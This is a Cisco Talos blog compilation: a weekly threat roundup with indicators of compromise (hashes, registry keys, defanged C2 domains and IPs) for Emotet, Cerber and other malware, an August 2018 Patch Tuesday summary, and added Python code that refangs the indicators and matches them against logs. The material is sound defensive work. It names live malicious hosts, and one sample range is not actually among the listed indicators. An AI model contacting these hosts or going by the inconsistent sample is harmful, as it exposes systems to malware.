Channel: Cisco Talos Blog

Threat Roundup for August 3-10


Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 3 - 10. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Malware.Dbzx-6628757-0
    Malware
    This is a variant of the Tspy family. It executes after every reboot, giving it persistence. It contacts domains associated with RATs, which generally act as command and control (C2) servers, to upload data and receive additional commands. The samples are often packed and contain anti-debugging tricks to complicate manual analysis.
     
  • Win.Malware.Emotet-6628754-0
    Malware
    This cluster provides generic detection for the Emotet trojan that is downloaded onto a target's machine. Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.
     
  • Win.Malware.Zerber-6629234-0
    Malware
    This is a malware identification for a ransomware variant of Cerber.
     
  • Win.Malware.Startsurf-6628791-0
    Malware
    Startsurf is a trojan aimed at collecting personal information; other coverage signatures sometimes label it as a potentially unwanted application (PUA).
     
  • Win.Packed.Eorezo-6629326-0
    Packed
    This malware is known to enable the display of advertisements in Internet Explorer. It also downloads several pieces of software and installs them in the background.
     

Threats

Win.Malware.Dbzx-6628757-0


Indicators of Compromise


Registry Keys
  • <HKLM>\Software\Wow6432Node\Microsoft\Tracing
Mutexes
  • QSR_MUTEX_HnRHWDxWQnveBdUtWT
IP Addresses
  • N/A
Domain Names
  • ip-api[.]com
Files and or directories created
  • N/A
File Hashes
  • 25430a357d53aec77dd1f119b838ceae79a22bb3a60c7a002cb7328b098546a7
  • 54279416f864d374f33fe9a2fe2998db3976c4ff43e8b0da006548489a50bbdd
  • 5ce812ebf77f6d63de37a1e3d261b9688d595aaeadaef3388f4214896bb64892
  • 810fb35557e051a7be3f03b37247c90796595a2d5afa1b2c3034187de2a3f0bc
  • 8f08bcadd3a44055a70dbae3308cf18c8d1824e424100eda03ddc71e9417fb5e
  • 9435b87c7c91ac98f9f461aeaa6b1630e2270e2d2ccdf6a05d46fa02de91d1eb
  • 9634a2afb40139e39da8c8ef0da8f5104229d7bb4c3b95faee5a4396713f528e
  • a137c89d2c6f0ae74217724e1cb56aea726e285d0e6e98adfda16617ad51d176
  • a2907c7011b20373fd47e03a0f4679fdd51b982b973bb37d1d45bfa4a618bc5a
  • b3c6a0883d9ed8bcf1bf162c0ade8b16f2cd4ae890e30ba9e9540f4bdf5f5ba1
  • ba5afe1245d10f72637d34a96bf6e365c2f4326da69dcd440beacf421b634133
  • cd3a4783c2795a16c82518c56f955c9b56f415d59ef5bc77e143f6124123364b
  • d0dbd75a4d8716ba7ca7d025ee1c772aa4ff554214a993b4b874a0a26dcf5a6c
  • e2116a9a176ff765f1c5ec23003266bfe0f1592e46e41236482ad4c3520ea53a
  • e2846881f6127d99222144e4ece509bd18522fdd7791bf84d7697b37ffa40919
  • efc3e1b1d6c13c3624160edc36f678dd92f172339bfde598ad1a95b02b474981
  • f7df8c9e36cf3440709111a33721e7ac7268a2a80057df08843ba95a72c222eb
  • fdd4cce37fd524f99e096d0e45f95ac4dac696c8d7e8eb493bb485c63409c7b3

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Malware.Emotet-6628754-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • PEMB2C
  • PEM944
  • PEM80C
  • PEMA10
IP Addresses
  • 67[.]68[.]235[.]25
  • 187[.]192[.]180[.]144
Domain Names
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\TO5sH5uBMit.exe
File Hashes
  • 0406ad0fe90d371b02742e6821486abbfbf2bbd72a7593e8ddb650f0b97673b3
  • 0604aa87706cb7890075b494f026c88b2f03b621367f1bb62a87f5c5deb87870
  • 086af92d83279f5792c15a762a70e158de54b67c1a96bfc14c4ad52a24468f32
  • 10f13af2a3591efa3d58c47bb0635e3a653e14ec7726493bb4595b4dd8cd51cb
  • 127c316e7a10579e61369d6a8154e3e34726209b3cc075ddd6d9875c439c583e
  • 1fc9fda1b0c868dc7cb0cf6d8867b7aefc202436fe9e41cba5b2b35bb1ce9e9f
  • 23ba67cf24c95f3bfd36b66f822feb3d2fd0f72617921550fee034a1b7b8cc74
  • 27e37ac7cc8b48573a8345223399ce6b0ab9432ee977acf02c09bcf64cf6622d
  • 2bf1192e5200b6f8d25586908b05912a5fa6e06e87540dbb914200446a3deb10
  • 2ee83958eb1e8cb622ca833c38e51b53548d299b6574e5b7203741a2d27963f5
  • 2fca527cf8ebf4576e982118e22dfe3fd8e445749a5403dafed36089666f2357
  • 30bbfb79d26a172975e9482204f06423eff6948b1732384e7b6d23f9932ec08d
  • 30bf6e1a41dea6e4024853f9b7a6a878e4f5e4141dba4b0fe7686159925fe6cf
  • 42fca9d196c668747b74f80ca996aee9ae38bed96956b42436949a8d4d33ecf1
  • 45e6356ca3b373da3a80a72a1b64f1254f4426949598b8877abd6de99e379166
  • 4ac5db87bc83dcbf1399f4fc0fede3c5ecee5b8ef2a2500fd79b1588ef033429
  • 4b2f6d80bf78ad165c2f07d914cb4137ba31918f3f8f03f812b20715c3451f56
  • 4d7d9d73dad989590860178530dd8848d9b79a23f1cb379bc1ca5545cb196eca
  • 4e81241256ab4adb5bb96b21633d95773cc34ee72e499659064db0d32046dabf
  • 4ea92195bc159e268c7a348f2649010cb01a3e67c315d2f0b8115eaf2c879692
  • 5639d3af9cf530a057aebf3cbf92061b58539b2c311491a26d8f404a211d66bb
  • 59644dcd34cce275ff5d72c022fa76ac42a422b038d816909281e01e392d3b40
  • 599e4e8130e4a1f3f3777c6f9f088cc03c2781f4e802e0e16e417a43ec58c518
  • 5eef8b5433ebc22e4c9ea3c1462d525192a4bda8d20be4e7b09fe7d03fb9d119
  • 6238c7a704baa8771812e4f3452acb042c6475913db4cd57cfaf17a7454d4d22

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Malware.Zerber-6629234-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: FlashPlayerApp
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
    • Value Name: Run
  • <HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
    • Value Name: AutoRun
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
Mutexes
  • shell.{381828AA-8B28-3374-1B67-35680555C5EF}
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %AppData%\Microsoft\Windows\Start Menu\Programs\StartUp\FlashPlayerApp.lnk
  • %AppData%\{6F885251-E36F-0FE6-9629-63208157D7A2}\FlashPlayerApp.exe
File Hashes
  • 25f8455b83b98f38809af120e35c3eda189a05538f7aa2d527a265520bc3c75e
  • 342a9470e5d3dd522c17cf0a5bc588d87a84689d90362c0b18c320385b2e908d
  • 41ebdf1d4a210f395d5ee32bf55c6b07ee1e0a0bdf939bd081f6d751323c643c
  • 54be105a129d959359107d7dff6b379cd366e32bf7be9ac9a06bc2141d3ca7fa
  • 5dce0e7e0a1807d2804f28c5d5afd4ac282a022acd1945786bd118e1caf4050c
  • 5fe244200c9367e1b132ccc13df6daaba5479d2491db8fe95658f43981567c5a
  • 6292ddf51023ccca84211ed4f33944b4c3df1b694d102d90d3dd2a5a080ed2b9
  • 649c52d7b9a58837e6ccd308665d63971e424d29480c44448ddbef15e91649a6
  • 6dd74f0816f8b24a6f93c2dae0c69d33689e4baba632605d138216d9c7aab2ba
  • 7322fb7767b733ef5a279720f581d54edae9ea4af69d39aaa3e79fc443e2bb33
  • 76be26ac77aa81a5fb7d78135adb05b579cecc2173ffef5f5ab6b484e37f9e6e
  • 793b978af24469a77490ea609de0142ff817e557ad78a688dd5d65c2fe49a8db
  • 7c0e65092e8786d9052bbd74f4dc7b26567e150efb25d1503c4bfd9b3895b8ab
  • 8815e1daad1f9cb4ff4243ff485218e3a0be93e2afef07048852ba79fdd9294e
  • 8e84fbc38403f1516447b73b73b5051777314089f0d1fefcfae004b1ef615641
  • a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b
  • b6b3b53b1001b6de24797a89d61bd825760574ab4cb60f7a5971115acb53c8e4
  • ef66d0161200d413bb8a577a517fe03f325f2fd2f0df778f6297a8658ca0abc8
  • f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04
  • f8ee14337fe367aded0aee32c6c84ce404eaef53a6f75d86c6c08235f55ec303

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Malware.Startsurf-6628791-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Local\MSCTF.Asm.MutexDefault1
IP Addresses
  • N/A
Domain Names
  • lip[.]healthcakes[.]men
Files and or directories created
  • N/A
File Hashes
  • 00cc9438408d1b22b0afc57e3b233ff62774cbcb92e58b392403d8c794d988ed
  • 118e08c379b0035cef2a155d59d97c6e8cae94b6f46c5e77f58d84c88c689d2c
  • 1f270dc860158d63bb400e08f12bce40a9a50494368ea6e44cfd89f7e0dc23f4
  • 3e49b3e58eec40b735124509bafcf434904f5945c9d65a5a860b0950850a979d
  • 4348a4b50eba73d6eb5d0d254241d0e44fc63c975b589ac5276d6dc5cf8bab13
  • 4a1c1cf9c70b127cc514fa6cdbb0e286ee33bf19f6ff41ca02951c9947dac55e
  • 4ae8cf675d6517b7989391fc653e8ddc96aa81cec4802e7e66de30adf0e96d2e
  • 527eac30113eb365330ec5c35591fe9ae69d4e1beca8b0ae24666e97d8773e36
  • 53366f90f59348b8de81bdc04652200d2dcf8bad5cfc46a533c3b20cd0e200b2
  • 5f98685ee9098a31ced944840670772bb972db31ac5d1690974e59f566d1adae
  • 61e7c5b6a7f1608cf0bf728d15f8cdfc0f9f5c7c3748ee28452cfa2a496e54cc
  • 70ebc88b9a71c661b68325dd92d0945ea1927e4d115da217640a4efefcf0c730
  • 722e86b32635a1cace77ceee414761f28e386743fd2c513650e55814179bdac5
  • 91bb8eb10e0aa88ea1e33d1ec23893d5a45e01e8ab69081b96835b4aff3b906a
  • 97645bb27e056b282a0aa46dbbc79ed03bdc29c6f96e369d7537ee2bb1c8dd6e
  • 9b36f0e70d5f7b4795b1278e052356484d4f2374f49563195f224ade6ce08c71
  • ac86cafcc7062a389e25a4e26dd15df7ce2e64b7a6890bf5712189ab9ec81c8c
  • c3883ba74230604d38a638a1b8d0673cc3c91e01b482e6b83a6e6bbd4edd3b10
  • c56e3ca164803c5668cf0b8228c97626c486f5a7063d4b3109840137b67c8f98
  • c82eaf2f1f156b95b43b2a984867e486911f6ceb329daea6ac9a6c53fae42685
  • ca544eaedd654782fa6b7a130bdc58869c2124a59754ed1baf9a5c00fafae12a
  • d4ab2cc67c707cab8f7aab0fde94b50670f1b787b049f45564fe5368205ed642
  • eac8c3c76e954d8e2be7a5d1570643b4ce6a856e8143faf6263ad50cf53aceb2
  • f0a9c1c2fc19b4abd905e8a2f187f94e74dfe1e7de2d9a5328b13893b301488d
  • fb2aa3891cc9383631ddcca4076ae800d67d701a7ffb83d48240cc1d72372175

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Packed.Eorezo-6629326-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: 6518673
Mutexes
  • Amazonassistant2018
  • Windows Workflow Foundation 3.0.0.0_Perf_Library_Lock_PID_2c8
  • Windows Workflow Foundation 4.0.0.0_Perf_Library_Lock_PID_2c8
  • WmiApRpl_Perf_Library_Lock_PID_2c8
IP Addresses
  • N/A
Domain Names
  • www[.]wizzmonetize[.]com
  • ionesystemcare[.]info
  • www[.]rothsideadome[.]pw
  • www[.]usatdkeyboardhelper[.]pw
Files and or directories created
  • %ProgramFiles%\WJTLINYZUI\cast.config
  • %LocalAppData%\Temp\DaGXhZc6w\Nursehealth.exe
  • %System32%\Tasks\One System Care Monitor
  • %ProgramFiles% (x86)\OneSystemCare
  • %SystemDrive%\TEMP\config.conf
  • %LocalAppData%\Temp\U8R09Z5FM2\OneTwo.exe
  • %LocalAppData%\Temp\U8R09Z5FM2\up.exe
  • %WinDir%\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new
  • %ProgramFiles%\WJTLINYZUI\GCOMQP0KN.exe
File Hashes
  • 002d9959f5e7417cc2cbc657243f2dab82fac3d2e94fa2d0c8e45eda10889b08
  • 03c948623cf78efe90258d894ab0e793bca7009bd73d0be0f652575f81bda621
  • 0f8d729821902252b7f7a1c0d51004d3770356969e7181548126f13f1e2ebf2a
  • 1e64134ff7358ea6e632fd2377532491235cf089f33095a72552e150088b42f1
  • 1eed9456e69a80cb4e8444ad0356d71e09a073715f92e51afa008e80d2a0352a
  • 26f928ef89fde0e3e3fa996073c7c0bba00c2cbfe280de338de15367f4c8f76b
  • 2b0c6557b39ad8cca97ea6975aa3f4a8341774461b1bacab05d04ab20a9463eb
  • 3a5ac5c5ee7985367349d84d60be2c5f94f876c56cf73acbae6fc680ebbdb3c6
  • 47bcf1f1bca23a36e291a0ac4cb8d1cd59c0c80d6a8e3b2cc3d646284cc531d5
  • 4ae3efb9a9cca68c098dcdba33d2aef39888cf229cd02be64cbf59a0b68dae30
  • 5112edf0351d70ad31152f67e8996c9c4ad062f0023cfd43b4baecb8aa7b16b4
  • 52544303a89f2c4e3eedd64c000504a2ef4c920c20361961fc81cae3f520244f
  • 55e181f0e0e88efccf6534949ad8dd93a179e2b94b71e76a9e7db4d938ea2bd2
  • 56982cc1f4b4e92aea28a30684bdfc752122eb78fc545ccc3f4169a1597233cc
  • 5c3982a206d40ec00b2029d4bdde1bb37192341583e803556872b97a609411ae
  • 61ee5c724a4c9408e9c8120eabac1babea8e91bf5719b02c78ce129f68239ff6
  • 63cc723ad7e85798e9126f5cc933c48d0e3cdfa7504579ef0b0b3cced9cb19c8
  • 65a0bb3fd94ec888696598703ed111471bd47962278a5f1006e7e0716bd5b58e
  • 71d6d1ed9a5bd71e8dbd03a91151a2965ac12198fa1825366bf19c4b14106cb7
  • 71e3009284ae35a3087ef041162a2ada636b388738033ea62faefc2bbfca9dfc
  • 7e17ee126754a9306b4ffcf536f384abe5c718672807de1e27e7c7f3846d9e74
  • 85b36ab50aeb452822886815076c7c90c30273854496dde7fd3473e62119f672
  • 877b9a03f0b8763c265ecbc4be76ffafc9eb26c4b618c2827ce1e200797ca876
  • 885718a7bd95c44d14dec7f0efa101147b671e60a7ecac2622ac86061dab17f2
  • 9583c8f1f3c9982a45ed56fbc30f8be06708cfaa8557aa7f5b6117847018cd4f
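
All of the IOC blocks above share one layout and one defanging convention: dots in domains and IP addresses are written as "[.]" so the indicators cannot be clicked or auto-linked, and some IP entries (the Cerber ranges in a later roundup) are CIDR blocks rather than single hosts. The Python below is an added example, not Talos tooling: it parses that layout back into typed indicators, rejects anything that is not a valid SHA-256 or IP/CIDR, and matches the result against a few constructed DNS, connection and file-hash log lines. The IOC values in the sample are copied from the lists above; the log format, the log lines and the malformed "not-a-hash" entry are assumptions made for the demonstration. Note the subdomain rule: a query for www.ip-api.com matches ip-api.com, but a query for healthcakes.men does not match lip.healthcakes.men. That asymmetry matters for dynamic-DNS indicators such as the no-ip.biz names in a later roundup, where the parent zone is shared with benign users.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Section titles as they appear in the roundup, mapped to IOCSet fields.
SECTIONS = {"Registry Keys": "registry", "Mutexes": "mutexes", "IP Addresses": "ips",
            "Domain Names": "domains", "Files and or directories created": "files",
            "File Hashes": "hashes"}
BULLET_RE = re.compile(r"^\s*•\s*(.+?)\s*$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
# Assumed log shape: "<ts> <host> dns query=<name>" / "conn dst=<ip>" / "file sha256=<hex>".
LOG_RE = re.compile(r"\b(?P<kind>dns|conn|file)\s+\w+=(?P<val>\S+)")

# Constructed excerpt in the roundup layout: values copied from the lists above,
# plus one deliberately malformed hash to exercise validation.
SAMPLE_IOC_TEXT = """\
IP Addresses
  • 67[.]68[.]235[.]25
  • 94[.]23[.]172[.]0/24
Domain Names
  • ip-api[.]com
  • lip[.]healthcakes[.]men
File Hashes
  • 25430a357d53aec77dd1f119b838ceae79a22bb3a60c7a002cb7328b098546a7
  • not-a-hash
"""
SAMPLE_LOGS = [  # constructed telemetry, not real logs
    "2018-08-09T10:02:11Z ws01 dns query=ip-api.com",
    "2018-08-09T10:02:12Z ws01 conn dst=94.23.172.77",
    "2018-08-09T10:02:13Z ws01 conn dst=94.23.176.1",
    "2018-08-09T10:03:00Z ws01 file sha256=25430A357D53AEC77DD1F119B838CEAE79A22BB3A60C7A002CB7328B098546A7",
    "2018-08-09T10:04:00Z ws01 dns query=healthcakes.men",
]

@dataclass
class IOCSet:
    registry: set = field(default_factory=set)
    mutexes: set = field(default_factory=set)
    files: set = field(default_factory=set)
    ips: set = field(default_factory=set)        # ipaddress networks; /32 for single hosts
    domains: set = field(default_factory=set)    # refanged, lower-cased
    hashes: set = field(default_factory=set)     # validated SHA-256, lower-cased
    rejected: list = field(default_factory=list)  # (kind, raw value) that failed validation

def refang(value):
    """Undo the "[.]" / "hxxp" defanging that keeps published IOCs non-clickable."""
    return value.replace("[.]", ".").replace("hxxp", "http")

def parse_iocs(text):
    iocs, section = IOCSet(), None
    for raw in text.splitlines():
        if raw.strip() in SECTIONS:
            section = SECTIONS[raw.strip()]
            continue
        m = BULLET_RE.match(raw)
        if not m or section is None or m.group(1) == "N/A":
            continue
        value = m.group(1)
        if section == "ips":
            try:  # single hosts become /32 networks, so one membership test covers both
                iocs.ips.add(ipaddress.ip_network(refang(value), strict=False))
            except ValueError:
                iocs.rejected.append(("ip", value))
        elif section == "domains":
            iocs.domains.add(refang(value).lower().rstrip("."))
        elif section == "hashes":
            if SHA256_RE.match(value.lower()):
                iocs.hashes.add(value.lower())
            else:
                iocs.rejected.append(("hash", value))
        else:  # registry keys, mutexes and file paths are kept verbatim
            getattr(iocs, section).add(value)
    return iocs

def domain_matches(iocs, qname):
    """Exact match or subdomain of an IOC; the parent zone of an IOC is not a match."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in iocs.domains)

def ip_matches(iocs, addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in iocs.ips)  # an IPv4/IPv6 mismatch simply yields False

def scan_logs(iocs, lines):
    """(kind, value) hits for DNS queries, destination IPs and file hashes."""
    hits = []
    for m in filter(None, map(LOG_RE.search, lines)):
        kind, val = m.group("kind"), m.group("val")
        if (kind == "dns" and domain_matches(iocs, val)
                or kind == "conn" and ip_matches(iocs, val)
                or kind == "file" and val.lower() in iocs.hashes):
            hits.append((kind, val))
    return hits
```

Running `scan_logs(parse_iocs(SAMPLE_IOC_TEXT), SAMPLE_LOGS)` yields three hits (the ip-api.com query, the connection into 94.23.172.0/24 and the hash, matched case-insensitively) and leaves the 94.23.176.1 connection and the healthcakes.men query alone. Validation failures are collected in `rejected` rather than silently dropped, so a copy-paste error in a feed is visible instead of becoming a hole in coverage.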

Coverage

Screenshots of Detection: ThreatGrid, Umbrella

Microsoft Patch Tuesday - August 2018


Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 60 new vulnerabilities, 20 of which are rated "critical," 38 that are rated "important," one that is rated moderate and one that is rated as low severity. These vulnerabilities impact the Windows operating system, Edge and Internet Explorer, along with several other products.

In addition to the 60 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180020, which addresses the vulnerabilities described in the Adobe Flash Security Bulletin APSB18-25.

Critical Vulnerabilities


This month, Microsoft is addressing 20 vulnerabilities that are rated "critical." Talos believes 10 of these are notable and require prompt attention.

CVE-2018-8273 is a remote code execution vulnerability in Microsoft SQL Server that could allow an attacker who successfully exploits the vulnerability to execute code in the context of the SQL Server Database Engine service account.

CVE-2018-8302 is a remote code execution vulnerability in the Microsoft Exchange email and calendar software that could allow an attacker who successfully exploits the vulnerability to run arbitrary code in the context of the system user when the software fails to properly handle objects in memory.

CVE-2018-8344 is a remote code execution vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document that is designed to exploit the vulnerability, and then convince users to open the document file.

CVE-2018-8350 is a remote code execution vulnerability that exists when the Microsoft Windows PDF Library improperly handles objects in memory. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. The vulnerability can be exploited simply by viewing a website that hosts a malicious PDF file on a Windows 10 system with Microsoft Edge set as the default browser. On other affected systems, that do not render PDF content automatically, an attacker would have to convince users to open a specially crafted PDF document, such as a PDF attachment to an email message.

CVE-2018-8266, CVE-2018-8355, CVE-2018-8380, CVE-2018-8381 and CVE-2018-8384 are remote code execution vulnerabilities in the way the Chakra scripting engine handles objects in memory in Microsoft Edge. An attacker who successfully exploits one of these vulnerabilities could gain the same user rights as the current user. They could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit them. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements.

CVE-2018-8397 is a remote code execution vulnerability that exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a webpage that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.

Other vulnerabilities deemed "critical" are listed below:

CVE-2018-8345    LNK Remote Code Execution Vulnerability
CVE-2018-8359    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8371    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8372    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8373    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8377    Microsoft Edge Memory Corruption Vulnerability
CVE-2018-8385    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8387    Microsoft Edge Memory Corruption Vulnerability
CVE-2018-8390    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8403    Microsoft Browser Memory Corruption Vulnerability

Important Vulnerabilities


This month, Microsoft is addressing 38 vulnerabilities that are rated "important." Talos believes two of these are notable and require prompt attention.

CVE-2018-8200 is a vulnerability that exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploits this vulnerability can potentially inject code into a trusted PowerShell process to bypass the Device Guard code integrity policy on the local machine. To exploit the vulnerability, an attacker would first have to access the local machine and then inject malicious code into a script that is trusted by the policy. The injected code would then run with the same trust level as the script and bypass the policy.

CVE-2018-8340 is a security feature bypass vulnerability in Windows Authentication Methods that affects Active Directory Federation Services (AD FS). An attacker who successfully exploits this vulnerability could bypass some, but not all, of the authentication factors.

Other vulnerabilities deemed "important" are listed below:

CVE-2018-0952    Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability
CVE-2018-8204    Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
CVE-2018-8253    Cortana Elevation of Privilege Vulnerability
CVE-2018-8316    Internet Explorer Remote Code Execution Vulnerability
CVE-2018-8339    Windows Installer Elevation of Privilege Vulnerability
CVE-2018-8341    Windows Kernel Information Disclosure Vulnerability
CVE-2018-8342    Windows NDIS Elevation of Privilege Vulnerability
CVE-2018-8343    Windows NDIS Elevation of Privilege Vulnerability
CVE-2018-8346    LNK Remote Code Execution Vulnerability
CVE-2018-8347    Windows Kernel Elevation of Privilege Vulnerability
CVE-2018-8348    Windows Kernel Information Disclosure Vulnerability
CVE-2018-8349    Microsoft COM for Windows Remote Code Execution Vulnerability
CVE-2018-8351    Microsoft Edge Information Disclosure Vulnerability
CVE-2018-8353    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8357    Microsoft Browser Elevation of Privilege Vulnerability
CVE-2018-8358    Microsoft Browser Security Feature Bypass Vulnerability
CVE-2018-8360    .NET Framework Information Disclosure Vulnerability
CVE-2018-8370    Microsoft Edge Information Disclosure Vulnerability
CVE-2018-8375    Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8376    Microsoft PowerPoint Remote Code Execution Vulnerability
CVE-2018-8378    Microsoft Office Information Disclosure Vulnerability
CVE-2018-8379    Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8382    Microsoft Excel Information Disclosure Vulnerability
CVE-2018-8383    Microsoft Edge Spoofing Vulnerability
CVE-2018-8389    Scripting Engine Memory Corruption Vulnerability
CVE-2018-8394    Windows GDI Information Disclosure Vulnerability
CVE-2018-8396    Windows GDI Information Disclosure Vulnerability
CVE-2018-8398    Windows GDI Information Disclosure Vulnerability
CVE-2018-8399    Win32k Elevation of Privilege Vulnerability
CVE-2018-8400    DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8401    DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8404    Win32k Elevation of Privilege Vulnerability
CVE-2018-8405    DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8406    DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8412    Microsoft (MAU) Office Elevation of Privilege Vulnerability
CVE-2018-8414    Windows Shell Remote Code Execution Vulnerability

Coverage


In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

45877-45878, 46548-46549, 46999-47002, 47474-47493, 47495-47496, 47503-47504, 47512-47513, 47515-47520
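
The SID list above is only useful if those rules are actually present and enabled in the ruleset a sensor loads. The Python below is an added example, not Talos or Snort tooling: it expands the published ranges, indexes a rules file by its `sid:` option (treating a rule commented out with a leading `#` as disabled), and reports which listed SIDs are active, disabled or absent. The rules text is constructed for the demonstration, with placeholder rule bodies that say nothing about the real rules' content; point `index_rules` at your deployed snort.rules to run it for real.

```python
import re

# The SID list exactly as published above.
SID_LIST = ("45877-45878, 46548-46549, 46999-47002, 47474-47493, "
            "47495-47496, 47503-47504, 47512-47513, 47515-47520")
SID_RE = re.compile(r"\bsid\s*:\s*(\d+)\s*;")

# Constructed rules excerpt: one listed SID enabled, one commented out, a second
# enabled listed SID, and an unrelated local rule. Bodies are placeholders only.
SAMPLE_RULES = """\
# constructed excerpt, not the Talos ruleset
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder"; sid:45877; rev:1;)
# alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder"; sid:45878; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"placeholder"; sid:46999; rev:2;)
alert tcp any any -> any any (msg:"local placeholder"; sid:1000001; rev:1;)
"""


def expand_sids(spec):
    """Expand "A-B, C, D-E" into the set of integer SIDs it denotes."""
    sids = set()
    for part in (p.strip() for p in spec.split(",")):
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        if hi < lo:
            raise ValueError(f"inverted range: {part}")
        sids.update(range(lo, hi + 1))
    return sids


def index_rules(rules_text):
    """Map sid -> True if at least one copy of the rule is enabled, False if every
    copy is commented out. Lines without a sid option (comments, blanks) are skipped."""
    index = {}
    for line in rules_text.splitlines():
        s = line.strip()
        m = SID_RE.search(s)
        if not m:
            continue
        sid, enabled = int(m.group(1)), not s.startswith("#")
        index[sid] = index.get(sid, False) or enabled
    return index


def coverage_report(expected, index):
    """Split the expected SIDs into active, disabled and missing."""
    return {
        "active": sorted(s for s in expected if index.get(s) is True),
        "disabled": sorted(s for s in expected if index.get(s) is False),
        "missing": sorted(s for s in expected if s not in index),
    }


if __name__ == "__main__":
    report = coverage_report(expand_sids(SID_LIST), index_rules(SAMPLE_RULES))
    for state, sids in report.items():
        print(f"{state}: {len(sids)}", sids[:10])
```

On the constructed excerpt the 40 published SIDs split into two active, one disabled and 37 missing, which is exactly the answer an operator wants before declaring a sensor covered: a disabled rule and an absent rule are both blind spots, but they are fixed differently (re-enable versus update the SRU).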

Beers with Talos EP 35: Live from the RiRa at Black Hat



Beers with Talos (BWT) Podcast Ep. #35 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast.

Ep. #35 show notes: 

Recorded Aug. 8, 2018 — We decided to broadcast while we were all together at Black Hat and invited everyone over for lunch and beers. Since we had a room full of people, we made this episode “choose your own podcast” and took topics from the audience. Neil Jenkins from the Cyber Threat Alliance came by to bestow befitting superhero swag on Matt and Adam for their work on VPNFilter. Headlining this event is our very special guest: Dave Bittner from The CyberWire.

The timeline:

The topics

3:50 - Roundtable - It gets interesting (read: long), but we bravely make it all the way down the table
22:44 - Choose Your Own Podcast! We take a variety of questions, starting with the existential
40:20 - Neil Jenkins from the Cyber Threat Alliance drops in to improve Matt’s belt game
48:23 - Dave Bittner from The CyberWire joins us and reminds us he is a professional. And we are not.

The links

Cyber Threat Alliance: https://www.cyberthreatalliance.org/
